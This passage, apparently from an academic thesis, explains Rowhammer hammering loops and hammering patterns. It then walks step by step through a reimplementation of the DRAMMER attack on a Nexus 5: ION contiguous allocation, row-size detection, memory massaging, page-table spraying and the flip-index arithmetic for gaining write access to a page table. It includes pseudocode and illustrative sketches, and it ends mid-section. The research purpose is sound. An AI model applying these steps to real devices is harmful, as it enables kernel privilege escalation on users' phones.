When the memory controller uses an open-page policy (2.5), the most recently accessed row is kept open in a buffer, in an attempt to save ACTIVATE and PRECHARGE commands when the same address is accessed continuously. In that case the corresponding data is already in the row buffer and no new activation is produced. Therefore, two physical addresses that correspond to different rows in the same bank must be accessed to guarantee that the row buffer is cleared between memory accesses. A code sequence to induce the disturbance on a real system with an open-page memory controller policy was first constructed in the seminal rowhammer study. It uses a loop that generates millions of reads to two different DRAM rows of the same bank in each iteration, and is designed to generate a read from DRAM on every data access. The code consists of two mov instructions that read data from DRAM at addresses X and Y into registers, two clflush instructions that evict the accessed data from the cache, an mfence instruction that ensures the data is fully flushed before any subsequent memory instruction, and finally a jump back to the first instruction for a new iteration:

    code:
      mov (X), %eax
      mov (Y), %ebx
      clflush (X)
      clflush (Y)
      mfence
      jmp code

Two aspects of the code are key to guaranteeing direct DRAM access:
 The two consecutive mov instructions access two different DRAM addresses. If just one address were accessed in each loop, the row would be served directly from the row buffer, which does not toggle the wordline and avoids the disturbance effect. The values of X and Y must be chosen correctly so that they map to different rows within the same bank, guaranteeing the eviction of the row buffer on each memory access.
 It is necessary to flush the cache on each iteration so that every memory access goes directly to DRAM. At the time of the study, a clflush instruction was used for this.
On the other hand, recent studies have proposed a new rowhammer attack method for closed-page memory controller policies. The closed-page policy (2.5) immediately closes the row and precharges the bank to be ready for a new row to open. In this case it is not necessary to evict the row buffer to toggle the row, so a simpler code sequence can trigger the vulnerability:

    code:
      mov (X), %eax
      clflush (X)
      mfence
      jmp code
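The assembly loops above can be mirrored in C with compiler intrinsics. The sketch below is our own bounded illustration (assuming an x86 target with SSE2 and a GCC/Clang toolchain); the hammer() name and iteration bound are ours, and a real attack must additionally arrange for x and y to map to different rows of the same bank and run millions of iterations per refresh interval, which this sketch does not do:

```c
#include <stdint.h>
#include <stddef.h>
#include <emmintrin.h>   /* _mm_clflush, _mm_mfence (SSE2) */

/* Bounded version of the double-address hammer loop: read X and Y,
 * flush both cache lines, fence, repeat. Returns the number of
 * iterations performed so a caller can confirm the loop ran. */
static size_t hammer(volatile uint8_t *x, volatile uint8_t *y,
                     size_t iterations)
{
    size_t i;
    for (i = 0; i < iterations; i++) {
        (void)*x;                       /* mov (X), %eax */
        (void)*y;                       /* mov (Y), %ebx */
        _mm_clflush((const void *)x);   /* clflush (X)   */
        _mm_clflush((const void *)y);   /* clflush (Y)   */
        _mm_mfence();                   /* mfence        */
    }
    return i;
}
```

With only a handful of iterations, as below, no disturbance is expected; the point is the structure of one iteration, not the flip itself.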

6.4.1 Rowhammer Types
This section overviews the different methods of hammering a vulnerable DRAM, which differ in their memory access pattern. A schematic comparing the three hammering patterns is shown in Figure 18. The rows marked with a hammer are the hammered locations (aggressor rows) and the grey ones are the locations most likely to show bit flips (victim rows). Note that the way hammering is conducted affects the efficiency of flipping bits, so the method used in each case must be cautiously selected depending on the attack environment.

Figure 18 Different hammering strategies. Figure in

6.4.1.1 Single-side rowhammer
Attacks that rely on the activation of just one aggressor row are called single-side rowhammer. The single-side approach has been used in probabilistic attacks. In this case it is enough to know the row size, so that addresses in the same bank can be found. The X and Y values just need to map to different rows within the same bank, so that the row buffer is evicted and the row is accessed directly from the RAM on systems with an open-page memory controller policy. Note that such a pattern hammers the victim row from one side only, which is generally flexible but slow. A challenge to consider is the need to find physical addresses that map onto rows of the same bank. Early projects confronted this challenge by picking random addresses, following probabilistic approaches. If single-side hammering uses a set of unrelated addresses and accesses them at high frequency, the probability that two addresses map to the same channel, rank, and bank is no higher than 1/(C·R·B), where C is the number of channels, R the number of ranks, and B the number of banks. Some attacks increase the efficiency of triggering bit flips by finding out in advance which rows belong to the same bank, using the different techniques described in section 4.1.2.
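The same-bank collision probability just discussed is a simple product under a uniform-mapping assumption; the helper below (name ours) evaluates it for a hypothetical configuration with 2 channels, 2 ranks, and 8 banks, giving 1/32:

```c
/* Probability that two uniformly mapped addresses fall into the same
 * channel, rank, and bank: 1 / (C * R * B). This assumes a uniform
 * address-to-bank mapping, which real controllers only approximate. */
static double same_bank_probability(int channels, int ranks, int banks)
{
    return 1.0 / (channels * ranks * banks);
}
```

This is why probabilistic single-side attacks need many address candidates: on average C·R·B random pairs must be tried before one pair shares a bank.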

6.4.1.2 Double-side rowhammer
The double-side rowhammer attack aims to improve the effectiveness of the attack on open-page memory controller systems. The method targets a specific memory row and hammers its two neighbouring rows (two aggressor rows), above and below the victim row in physical memory. On vulnerable DRAM it can guarantee a reproducible bit flip for a specifically chosen victim address location. Such attacks require knowledge of the physical memory mapping of the DRAM in order to identify the addresses of the neighbouring rows. The attack is mounted by carefully choosing the X and Y values: they must correspond to the physical rows above and below the victim row in the DRAM. Which bits of the physical address correspond to each row, bank, DIMM (Dual In-line Memory Module) and memory channel must be understood in order to perform deterministic double-side rowhammer. Note that these system specifications are commonly proprietary and closed.


Double-side hammering is the most efficient way to perform rowhammer, but more complex research into the memory architecture of the system under attack must be carried out in order to correctly choose the three adjacent rows. In a double-side rowhammer attack, the exact physical address mapping of all the banks should be known, so that both rows directly above and below the victim one can be accessed.

6.4.1.3 One-location hammering
One-location hammering is a recent attack primitive presented in 2018. This technique hammers only one memory location; the attacker does not directly induce row conflicts to evict the row buffer but only re-opens one row permanently. It applies to modern systems that employ more sophisticated memory controller policies (closed-page policies), which pre-emptively close rows earlier than necessary to optimize performance (2.5). With one-location hammering, the attacker only runs a Flush+Reload loop on a single memory address X at maximum frequency. This continuously re-opens the same DRAM row whenever the memory controller closes it. The method needs no knowledge of the physical address mapping, and does not even need to find addresses in the same bank. Since the attack does not access different rows in the same bank, it bypasses the rowhammer defences based on detection through analysis of memory access patterns (5.3). On the other hand, although it has been observed that one-location hammering drains enough charge from the DRAM cells to induce bit flips, the percentage of bits that can be flipped is lower than with double-side and single-side hammering. The research presents a comparison of the effectiveness of the three rowhammer methods: a test on a Skylake i7-6700K with 8 GB of Crucial DDR4-2133 DIMMs that scans the percentage of bit flips while attempting to hammer random memory locations. Comparing the bit flip distribution over 4 KB aligned memory regions, the flip-bit offsets are slightly more uniform for single-side hammering (78.5%) than for double-side hammering (77%), and much worse for one-location hammering (36.5%). One-location hammering is usually weaker and slower than the other two types, but it is much stealthier, as it requires no privileges.

 Build Properties The specific kernel version running on the device can be found in the /proc/version system file. Also, the build.prop file is a system file that contains build properties and settings; some of them are specific to the device manufacturer, others vary by OS version. We used it to find more detailed properties of the specific kernel build, such as ro.build.description and ro.build.fingerprint. It provides information such as the build number, the Android version, and ro.product.cpu.abi, which references the ABI (Application Binary Interface) selected for the specific device. A summary of the most important build properties of the device under study is shown in Table 15. Different Android handsets use different CPUs, which in turn support different instruction sets. Each combination of CPU and instruction set has its own Application Binary Interface, or ABI. The ABI defines, with great precision, how an application's machine code is supposed to interact with the system at runtime. The embedded-application binary interface (EABI) specifies standard

conventions for file formats, data types, register usage, stack frame organization, and function parameter passing of an embedded software program, for use with an embedded OS.

| Build property | LG Nexus 5 |
|---|---|
| Kernel version | 3.4.0-gd59db4e |
| gcc version | 4.7 (GCC) |
| Build date | Mon Mar 17 15:16:36 PDT 2014 |
| ROM build version | 4.4.4 |
| Build number | KTU84Q |
| Fingerprint | google/hammerhead/hammerhead:4.4.4/KTU84Q/1253334:user/release-keys |
| ABI | armeabi-v7a |

Table 15 Build properties for the device under attack

Information such as the build number and the ROM build version is used to find the build files for the specific kernel, in order to obtain the more specific details necessary for the attack implementation. The modified kernel source for the specific vendor and the MSM8974 SoC is Android 4.4.4_r2 (or kitkat-mr2.2-release) and is referenced as android-msm-hammerhead-3.4-kitkat-mr2 [103].

 ION Heap IDs availability The ION heap declaration for the specific kernel is found in the source code [103]. It describes the ION heaps available on the mobile device under attack, allowing us to check whether the attack can succeed on the specific build version. The file msm8974-ion.dtsi in the folder arch/arm/boot/dts contains the declaration of the available ION heap IDs and their types. We can see that it includes the declaration of ION heap 21 as a SYSTEM CONTIG heap type. We can therefore allocate contiguous physical blocks from heap 21 and use them to trigger the double-side rowhammer attack.

    qcom,ion-heap@21 { /* SYSTEM CONTIG HEAP */
        reg = <21>;
    };

The countermeasures taken by Google in new Android kernel versions try to protect kernel memory from double-side rowhammer attacks by disabling the contiguous heap (kmalloc heap) in the system. This removes the possibility of allocating contiguous memory and performing double-side rowhammer, which greatly reduces the number of bits that can be flipped.

 Memory Information The buddy allocator manages the physical memory on Linux platforms; it prioritizes the smallest fitting block on each allocation, as described in previous sections of this text (2.7). In order to reduce internal fragmentation, the slab allocation abstraction is implemented on top of it. The slab allocator aims to serve allocation and deallocation requests quickly by organizing small objects into a number of slabs (page blocks) of commonly used sizes. The kernel groups pages into the same contiguous region of memory (page blocks) to satisfy high-order allocations.


The /proc/pagetypeinfo file of the proc file system provides detailed information about the available memory pages in each zone. It shows eleven areas that correspond to the block orders, separately for each memory zone (Normal zone and High zone). Each area is divided into the different migration types (Unmovable, Reclaimable, Movable, Reserve, CMA and Isolate), and each of the eleven areas represents the number of blocks of a certain order which are available for each migrate type. The size in bytes of the blocks in each column (each order) is 2^order × PAGESIZE bytes. An example of the file structure is shown below in Figure 41.

Figure 41 /proc/pagetypeinfo kernel file information
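The order-to-size formula above can be evaluated directly; the helper below (name ours) computes 2^order × PAGESIZE:

```c
#include <stddef.h>

/* Size in bytes of a buddy-allocator block of the given order:
 * 2^order * pagesize. Order 0 is a single page. */
static size_t block_size(unsigned order, size_t pagesize)
{
    return ((size_t)1 << order) * pagesize;
}
```

With the usual 4 KB page size, order-4 blocks are 64 KB (one row on the device studied here) and order-10 blocks, the largest the buddy allocator serves, are 4 MB, matching the L chunks used later in the attack.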

 Virtual Memory Mapping The kernel source file arch/arm/include/asm/pgtable-2level.h [103] describes how the Linux page tables are mapped, with slight adjustments, onto the hardware ARM page tables for our specific hammerhead Android kernel. Linux is presented with 2048 entries in the first level, each of which is 8 bytes and corresponds to two hardware pointers to the second level. The second level contains two hardware PTE tables arranged contiguously, preceded by the Linux versions, which contain the state information Linux needs. We therefore end up with 512 entries in the second level in the specific case under study. Each process is able to have 2048 page-table

Figure 42 Page Table Layout Walk on Android ARM

entries at the first level, each of which maps a 2 MB memory block, triggering a maximum of 1024 page tables. Each 2 MB of virtual memory thus triggers a page table of 4 KB size with the layout shown in Figure 42.
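Under the layout just described, the first-level entry covering a virtual address is simply determined by its top bits, since each entry spans 2 MB. A small sketch (helper names ours, assuming a 32-bit address space split into 2048 × 2 MB sections as on this kernel):

```c
#include <stdint.h>

#define SECTION_SHIFT 21u          /* 2 MB = 2^21 bytes      */
#define FIRST_LEVEL_ENTRIES 2048u  /* 2048 * 2 MB = 4 GB     */

/* Index of the first-level (Linux) page-table entry covering va. */
static uint32_t first_level_index(uint32_t va)
{
    return va >> SECTION_SHIFT;
}

/* Offset of va within its 2 MB section. */
static uint32_t section_offset(uint32_t va)
{
    return va & ((1u << SECTION_SHIFT) - 1u);
}
```

For example, address 0x40200000 falls in first-level entry 513, and the highest address 0xFFFFFFFF in entry 2047, consistent with the 2048-entry first level.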

6.4.2 Drammer Attack Primitives
The DRAMMER attack relies on the general memory management behaviour of the OS to realise the rowhammer attack primitives. We describe in this section the OS-specific behaviours exploited in the implementation of each primitive.

 Fast Uncached Direct DRAM Access and Physical Memory Addressing The fast uncached direct DRAM primitive needs to toggle the vulnerable row fast enough and to implement a mechanism that accesses the RAM directly, bypassing the cache. As discussed in previous sections (6.3.1), the double-side rowhammer attack covers the first requirement by improving the effect on the vulnerable row. To implement double-side rowhammer it is necessary to have access to contiguous physical address blocks, which allows hammering the rows above and below the victim one. Both requirements, uncached direct access and physical memory addressing, are achieved in the Android/ARM case by using the DMA (Direct Memory Access) memory management mechanism provided by the OS. More specifically, we use the ION memory API in our attack implementation to reserve contiguous blocks of memory that are accessed directly in DRAM, bypassing the cache. We allocate blocks from ION heap ID 21, which represents the contiguous heap type on the specific kernel. The ION blocks are provided only from the Normal zone of physical memory, from every migration type except the CMA and Isolate types.

 Memory Massaging Massaging the physical memory is necessary to land the sensitive data in the vulnerable location. We implement the Phys Feng Shui technique proposed in [2]. This technique relies on the predictable memory reuse patterns of the buddy allocator to force the OS to serve memory from regions that we predict, until it places the targeted sensitive data, a page table in this case, in the vulnerable region. We also have to control the memory rows neighbouring the vulnerable one in order to be able to trigger double-side rowhammer.

 Row Size Detection The ARM specifications [93] [104] do not document memory details such as the row size. A timing-based side channel is proposed as a solution in [2] to determine the row size of a specific DRAM chip. The technique relies on the fact that reading pages from different banks is faster than reading pages from the same bank (4.1.2.2), because the bank's row buffer must be refilled on each same-bank access. If we measure the time between sequential accesses to contiguous physical pages, we can therefore find the increase in access time that corresponds to same-bank accesses. We must measure the time between a pair of accesses to pages n and n+i, where i goes from 0 up to a number of pages large enough to guarantee at least one access within the same bank. In practice, for a typical PAGESIZE of 4 KB, it is enough to check up to 64 pages, for a maximum row size of 256 KB.
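The decision step of this side channel, turning a series of per-page access times into a row-size estimate, can be sketched in isolation. The helper below is our own simplification (names and the fixed-threshold classification are ours; real implementations derive the threshold from the measured distribution): it reports the spacing between "slow" same-bank accesses, multiplied by the page size, as the row-size candidate. In a real measurement the times would come from timed DRAM accesses; here a synthetic series stands in:

```c
#include <stddef.h>

/* Given access times for pages 0..n-1, find the distance (in pages)
 * between consecutive slow accesses, i.e. those above threshold.
 * Returns that distance times pagesize as the row-size candidate, or
 * 0 if fewer than two slow accesses are seen or the spacing varies. */
static size_t rowsize_from_timings(const unsigned *times, size_t n,
                                   size_t pagesize, unsigned threshold)
{
    size_t last_slow = (size_t)-1;  /* index of previous slow access */
    size_t dist = 0;                /* observed constant spacing     */
    for (size_t i = 0; i < n; i++) {
        if (times[i] <= threshold)
            continue;                   /* fast: different bank      */
        if (last_slow != (size_t)-1) {
            size_t d = i - last_slow;
            if (dist == 0)
                dist = d;               /* first observed spacing    */
            else if (d != dist)
                return 0;               /* inconsistent: give up     */
        }
        last_slow = i;
    }
    return dist * pagesize;
}
```

With a spike every 16 pages of 4 KB, the candidate is 64 KB, the value measured on the device in the next paragraph.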


The VUSec group [99] provides open-source code to test whether an Android device is vulnerable to the Rowhammer bug [105], including the rowsize.c library that implements an auto-detect function for the row size. We include their module in our implementation to determine the row size of our system, which is 64KB.
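As an illustration, the detection logic can be sketched offline on synthetic timings. The function, threshold and variable names below are our own simplification, not the rowsize.c implementation; on a real device the timings would come from timed uncached reads.

```python
# Sketch of the row-size detection logic from [2]: scan pairwise access
# times between page 0 and page i; same-bank accesses (row-buffer refills)
# show up as periodic latency spikes in the timing trace.

PAGESIZE = 4096          # typical 4KB page
MAX_PAGES = 64           # enough for a maximum row size of 256KB

def detect_rowsize(pair_times):
    """pair_times[i] = access time for the pair (page 0, page i)."""
    threshold = sum(pair_times) / len(pair_times) * 1.5
    slow = [i for i, t in enumerate(pair_times) if t > threshold and i > 0]
    if not slow:
        return None
    # The first slow index is the page distance between same-bank rows,
    # i.e. the number of pages per row.
    return slow[0] * PAGESIZE

# Synthetic trace: a latency spike every 16 pages -> row size 16 * 4KB = 64KB,
# matching the value rowsize.c reports for our device.
times = [300 if i % 16 == 0 else 100 for i in range(MAX_PAGES)]
rowsize = detect_rowsize(times)
print(rowsize)  # 65536
```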

6.4.3 DRAMMER Attack Implementation
The DRAMMER attack first requires templating the memory by identifying the vulnerable regions of physical memory (those prone to bit flips). The second step is to massage the memory so that the sensitive data lands in a vulnerable physical region, using the Phys Feng Shui rowhammer technique. In our attack, Phys Feng Shui forces the buddy allocator to massage the memory in a predictable way. By tricking the system, we aim to place a Page Table at a specific vulnerable location where we can reproduce the bit flip. Finally, rowhammer is triggered to corrupt the intended data and gain write access to the Page Table. Three types of physically contiguous blocks are used in this process. The blocks of size M and L are allocated using the ION API for userspace at heap ID 21 to guarantee the allocation of contiguous physical memory (6.3.2). The ION API reserves blocks from the DMA zone, which on our device is served from the Normal zone (6.3.2).
Large chunks: blocks L of size 4MB (the biggest contiguous block available)
Medium chunks: blocks M of size 64KB (the ROWSIZE of the system, 6.4.2)
Small chunks: blocks S of size 4KB (the PAGESIZE of the system, 6.4.2)

The blocks that contain the vulnerability are the vulnerable victim blocks and are referenced with the symbols L*, M* and S*.

 Step 1: Memory Template
First of all, we need to template the memory by looking for rowhammer vulnerabilities until we discover the first exploitable bit flip. We exhaust all L blocks available in memory on ION heap 21 and keep them in the vector ion_chunks_L. Afterwards, we examine each L block looking for an exploitable bit flip. Each block is tested row by row, excluding the first and last rows because they lack contiguous physical rows above and below. The test triggers rowhammer by accessing the aggressor rows above and below one million times with a determined pattern. Each pattern consists of specific values for the above_row, below_row and victim_row. In the example explained here we look for a 1-to-0 bit flip by setting the victim row to all 1s and the above and below rows to all 0s; this has been proven to be the template most likely to trigger vulnerabilities. In the implementation we also check for flips in the opposite direction, in case the DRAM cells in the mapped memory zone use the opposite orientation. The next step is to check the victim page byte by byte, looking for a 1-to-0 bit flip. If a flip is discovered, a handling routine gathers information about the position of the flipped bit inside the block L; this information will later help in reproducing the bit flip. As the last step, the exploitability of the flip must be checked before continuing. The templating of the memory continues until an exploitable bit flip has been found.


Step1
//Exhaust all the L blocks at the memory
while(exist L available)
    chunk_L ← ION_alloc(L)
    add chunk_L to ion_chunks_L

//Templating
for each chunk_L in ion_chunks_L
    for each row in block
        row_above ← all 0s; row_below ← all 0s; row_victim ← all 1s
        for each page in row
            //hammer victim
            for I = 1 to 1000000
                *page_above
                *page_below
            //check victim
            for each byte in page_victim
                if byte != all 1s
                    handle_flip_bit()
                    if check_exploitability() is true
                        goto step2
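The hammer-and-check inner loop can be sketched as follows. Note that on ordinary cached memory, as used in this sketch, no real flips can occur; on the device the rows live in uncached ION memory and the reads become direct DRAM accesses. The buffer layout and names here are illustrative.

```python
# Minimal sketch of the templating inner loop: set the aggressor rows to
# all 0s, the victim row to all 1s, "hammer" by repeated reads, then scan
# the victim byte by byte for 1-to-0 flips.

ROWSIZE = 64 * 1024

row_above  = bytearray(b'\x00' * ROWSIZE)   # aggressor pattern: all 0s
row_below  = bytearray(b'\x00' * ROWSIZE)
row_victim = bytearray(b'\xff' * ROWSIZE)   # victim pattern: all 1s

def hammer(above, below, iterations):
    # Alternately read the two aggressor rows; indexing forces a read.
    for _ in range(iterations):
        _ = above[0]
        _ = below[0]

def find_flips(victim, expected=0xFF):
    # Return (index, value) for every byte that deviates from the pattern.
    return [(i, b) for i, b in enumerate(victim) if b != expected]

hammer(row_above, row_below, iterations=100_000)  # shortened for the sketch
flips = find_flips(row_victim)
print(flips)  # [] -> no flips on ordinary cached memory
```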

The most important information kept by handle_flip_bit() is the following:
 virt_ion_chunk_L*: Virtual address of the vulnerable L* chunk
 virt_address: Virtual address of the vulnerable byte
 virt_row: Virtual address of the vulnerable row
 virt_page: Virtual address of the vulnerable page
 byte_index_in_row: The index position of the vulnerable byte in the block L*
 org_word: The victim word value before the bit flip
 new_word: The victim word value with the bit flip
 flip_direction: The direction of the bit flip; 1 for a 1-to-0 flip and 0 for a 0-to-1 flip


Figure 43 shows the victim L* block with the most important information regarding the bit flip. Note that L is allocated as an ION contiguous physical buffer, which means that contiguous virtual memory addresses also represent contiguous physical memory addresses.

Figure 43 Victim L* block and crucial information of the flip bit position. Aggressor rows in orange above and below the victim row.

Using the above information, other crucial details can easily be calculated, enabling the reproduction of the bit flip later on.
 rel_address: The virtual address of the victim byte relative to the start of the L* chunk.

rel_address = virt_address − virt_ion_chunk_L*

 rel_row_index: The index position of the victim row in the victim L* chunk

rel_row_index = rel_address / ROWSIZE
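For the example flip found on our device (the values used in the worked example of this section), these two quantities work out as follows:

```python
# Worked example of the relative address and row index of the flip
# inside the vulnerable L* chunk.

ROWSIZE = 64 * 1024

virt_address     = 0x9051C906   # virtual address of the vulnerable byte
virt_ion_chunk_L = 0x90500000   # virtual start of the vulnerable L* chunk

rel_address   = virt_address - virt_ion_chunk_L
rel_row_index = rel_address // ROWSIZE

print(hex(rel_address), rel_row_index)  # 0x1c906 1
```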

During the implementation of the exploit, we check the physical memory available at each step, using the /proc/pagetypeinfo kernel file, to verify that the step has been successful. Figure 45 shows the available physical memory before exhausting the blocks of size L, and Figure 44 shows the available physical memory at the end of the allocation. All the available L blocks (156 in the example) have been successfully allocated.

Figure 45 Available memory before the start of the attack Figure 44 Available memory after exhausting the L blocks


 Step 2: Memory Massaging – Exhaust M Blocks
At the start of the second step, we have found the victim L* chunk and have exhausted all the biggest blocks of size L in physical memory. The next step of the Phys Feng Shui technique is to exhaust all the M blocks available in physical memory.
Step2
//Exhaust all the M blocks at the memory
while(exist M available)
    chunk_M ← ION_alloc(M)
    add chunk_M to ION_chunks_M

At the end of this step, the physical memory has no available blocks larger than M. The resulting available physical memory is shown in Figure 46. Notice that there is no block available for DMA from order 3 upwards in the Normal zone for the specific migration types.

Figure 46 Available memory after exhausting L and M blocks

 Step 3: Memory Massaging – Free the Victim L* Block
The victim block L* found in Step 1 is the target of our exploit. We release it back to the OS in order to force the allocation of the Page Table inside it. Releasing the L* block follows the procedure described in section (6.3.2) to free the ION buffer and delete the ION buffer descriptor. Figure 47 shows the availability of our L* block of size 4MB.
Step3
//free the target block L*
for each chunk_L in ion_chunks_L
    if chunk_L is L*
        free(chunk_L)


Figure 47 Available memory after releasing the victim L* block

 Step 4: Memory Massaging – Exhaust Ms on L*
In this step, we aim to allocate M blocks inside the L* physical block that has just been released. The L* block (4MB) can contain 64 M blocks (64KB each). Notice that each M block will occupy one of the physically contiguous rows of the L* block (Figure 48). Due to the predictable way in which the buddy allocator fragments and reserves memory, and the fact that L* is physically contiguous, we can be sure that the M allocations occupy consecutive rows of L*: the buddy allocator serves one row of L* for each M allocation request (Figure 49). The relative index position of each row in L* corresponds to the index position of the M block in the ION_chunks_M2 vector.
Step4
//Exhaust all the M blocks at the memory
while(exist M available)
    chunk_M ← ION_alloc(M)
    add chunk_M to ION_chunks_M2

Figure 48 Buddy allocator behaviour on the allocation of M blocks


Figure 49 Available memory after allocating M blocks on the L* location

 Step 5: Memory Massaging – Release the Target M* Block
Of the 64 M blocks allocated, we need to release the target M* block: the one that holds the exploitable bit flip. M* is the 64KB block that corresponds to the target row. As demonstrated in the previous steps, the M blocks have been allocated contiguously, so the target block M* can be accessed at the rel_row_index position of the vector ION_chunks_M2.

Step5 //free the target block M* free(ion_chunks_M2[rel_row_index])

As a result, our M* block is available at order 4, while all memory blocks larger than 64KB (order 4) remain reserved (Figure 50).

Figure 50 Available memory after releasing the M* victim block

 Step 6: Memory Massaging – Avoid Low-Memory Conditions
The Phys Feng Shui technique increases memory pressure, which can put the system in a low-memory condition and trigger the LMK (Low Memory Killer) and OOM mechanisms, which decrease the pressure by freeing up unused memory to avoid a system crash. In preparation for the next allocation steps, the remaining L blocks must be freed, so that the low-memory condition does not trigger such memory cleanups.


Step6
//free the remaining L blocks
for each chunk_L in ion_chunks_L
    free(chunk_L)

We can see in Figure 51 that the only available block of order 4 (ROWSIZE) is M*, together with the 155 blocks of order 10 (4MB) that have just been released.

Figure 51 Available memory after releasing all the L blocks

 Step 7: Memory Massaging – Exhaust S Blocks
The goal is to place a target Page Table in the vulnerable M* block. We have to exhaust all memory blocks below order 4 by allocating S (PAGESIZE) chunks, to guarantee that subsequent allocations of PAGESIZE fall inside the vulnerable M* block. ION can only be used to allocate chunks of 16KB or larger [2]. Instead, we spread Page Tables by creating a tmp file of 2MB and repeatedly mapping it at every 2MB of the VM (Virtual Memory). Each Page Table can map 2MB of memory; thus, by mapping the same file at every 2MB of VM, we indirectly populate a new 4KB Page Table each time (6.3.2), which means a new S block is reserved. Since the maximum number of Page Tables per process is 1024, we create multiple child processes to allocate as many S blocks as needed. First, we calculate the hypothetical number of S blocks needed to exhaust all memory blocks of orders below 4, using the information in the /proc/pagetypeinfo file. Each child process spreads 500 Page Tables until 200 S blocks remain, which are then managed by the parent process. The child processes are kept alive until they receive a kill signal from the parent process, to ensure that their allocated memory is not released.

Figure 53 shows the result after one child process finishes its 500 PT spreads. Figure 52 shows the available physical memory left to be managed by the parent process after the children have finished.


Step7
//Spreading Page Tables
file_size ← 2MB
tmp_file ← create(file_size)
numS ← Number_of_S_blocks_available
maxPT ← 500
children_num ← (numS-200)/maxPT
mem_offset ← 2MB
for I=1 to children_num
    new ← fork()
    if new is child
        address_map ← mem_offset
        for J=1 to (maxPT-1)
            mmap(address_map,file_size,tmp_file)
            address_map ← address_map + mem_offset
        trigger child_signal
        while(1) do
            if father_signal==1
                break
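The spraying trick can be sketched with a plain file-backed mmap. The sketch only demonstrates that one tmp file can back many mappings, each populating its own page-table entries when touched; it does not place the mappings every 2MB of a chosen VA range as the attack does, and the mapping count is kept small for illustration.

```python
# Sketch of the Page Table spraying trick: a single 2MB tmp file is
# mapped repeatedly, so the kernel must populate fresh paging structures
# for each new mapping while all mappings share the same physical pages.
import mmap, os, tempfile

MB = 1024 * 1024
file_size = 2 * MB

fd, path = tempfile.mkstemp()
os.ftruncate(fd, file_size)
os.pwrite(fd, b'\xff' * 4096, 0)      # marker page (later used as p)

mappings = []
for _ in range(4):                    # the attack uses ~500 per child
    m = mmap.mmap(fd, file_size, prot=mmap.PROT_READ)
    _ = m[0]                          # touching the mapping populates a PTE
    mappings.append(m)

# Every mapping sees the same physical file pages.
coherent = all(m[0] == 0xFF for m in mappings)
print(coherent)  # True

for m in mappings:
    m.close()
os.close(fd)
os.unlink(path)
```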

Figure 53 Available memory after a child spreading the PTs

Figure 52 Available memory left to the parent process


 Step 8: Memory Massaging – Spreading Target Page Tables
In this step, we aim to improve the probability that the target Page Table falls at the correct vulnerable position by making the parent process spread Page Tables that can be targeted. The target Page Table (PT) that falls into the vulnerable page must have a Page Table Entry (PTE) located at the vulnerable word, pointing to a physical page p. The physical allocation of the source page p must be 2^n physically contiguous pages apart from the PT allocated at the vulnerable position of M*. Then, flipping the n-th bit of the base address in the vulnerable PTE will make the PTE point to the vulnerable PT itself (Figure 54). If the flip_direction is 1-to-0, the page p must be placed 2^n pages to the right of the vulnerable PT, and to the left if the flip_direction is 0-to-1.
Find out the physical location for p
To identify where to locate the page p in physical memory, we must first determine the position of the flipped bit in the PTE. The values to calculate are:
 bit_index_in_word: The index position of the flipped bit in the PTE.
 bit_index_in_baseaddress: The index position of the flipped bit in the base address. This value n gives the number of pages away from the vulnerable PT at which we must place the source page p.

Figure 54 Victim Page Table Entry format

The following is a numerical example for a real bit flip produced on our device. If the physical address of the vulnerable page is phys_page=0x301c000 and bit_index_in_baseaddress=7, the physical location of the page p must be phys_source_page=0x309c000 (Figure 55).

Figure 55 Example of physical address of source p from the physical page of the target PT

We aim to find the physical location at which to place p by using the previously obtained knowledge of the virtual address of the bit flip inside the contiguous block L*, so that the attack does not depend on the user's ability to access the virtual-to-physical address mapping. To achieve that, we need to find the following indices in L* (Figure 56).


 target_pfn_row: The row index of the vulnerable row in the block L*. At this row, we aim to place our target PT.
target_pfn_row = target_pfn / PAGES_PER_ROW
 source_pfn_row: The row index of the source row in the block L*. At this row, we aim to place our source page p.
source_pfn_row = source_pfn / PAGES_PER_ROW
First, we must calculate the corresponding values:
 target_pfn: The page index of the vulnerable page in the block L*. At this page, we aim to place our target PT.
target_pfn = rel_address / PAGESIZE

 source_pfn: The page index of the source page in the block L*. At this page, we aim to place our source page p.
source_pfn = XOR(target_pfn, 1 ≪ (bit_index_in_word − 12))

For our example:
 virt_address = 0x9051c906
 virt_ion_chunk_L* = 0x90500000
Then,
 rel_address = 0x1c906
 target_pfn = 28
 source_pfn = 156
 target_pfn_row = 1 (PAGES_PER_ROW=16)
 source_pfn_row = 9 (PAGES_PER_ROW=16)

Figure 56 Relative positions of source page and target page in victim block L*
The source_pfn_row and target_pfn_row indices in L* directly match the indices in the ION_chunks_M2 vector that point to the rows in the form of M blocks. We can therefore conclude that our page p must be allocated in the M block referenced at the source_pfn_row position of our vector (ION_chunks_M2[source_pfn_row]). Next, we need to find the index of the page within the specific row at which we must place the page p. For this purpose, we calculate the following indices:
 target_page_index_in_row: The index of the vulnerable page in the vulnerable row, i.e. the page within the target row at which we expect the target PT to be allocated by tricking the system.

target_page_index_in_row = target_pfn − (target_pfn_row × PAGES_PER_ROW)

 source_page_index_in_row: The index of the source page in the source row, i.e. the page within the source row at which we need to allocate the source page p in physical memory.

source_page_index_in_row = source_pfn − (source_pfn_row × PAGES_PER_ROW)

For our example:
 target_page_index_in_row = 12 (PAGES_PER_ROW=16)
 source_page_index_in_row = 12 (PAGES_PER_ROW=16)
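These indices can be verified numerically. The block below takes the flip of the worked example at bit 19 of the PTE word, i.e. bit 7 of the base address (bit_index_in_baseaddress = 7), and reproduces the full index chain:

```python
# Index chain of the worked example: from rel_address and the flip
# position to the rows and in-row pages for the target PT and source p.

PAGESIZE      = 4096
PAGES_PER_ROW = 16

rel_address       = 0x1C906
bit_index_in_word = 19       # flip at word bit 19 -> base-address bit 7

target_pfn = rel_address // PAGESIZE
source_pfn = target_pfn ^ (1 << (bit_index_in_word - 12))

target_pfn_row = target_pfn // PAGES_PER_ROW
source_pfn_row = source_pfn // PAGES_PER_ROW

target_page_index_in_row = target_pfn - target_pfn_row * PAGES_PER_ROW
source_page_index_in_row = source_pfn - source_pfn_row * PAGES_PER_ROW

print(target_pfn, source_pfn, target_pfn_row, source_pfn_row,
      target_page_index_in_row, source_page_index_in_row)
# 28 156 1 9 12 12
```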

Find out the virtual memory to map p
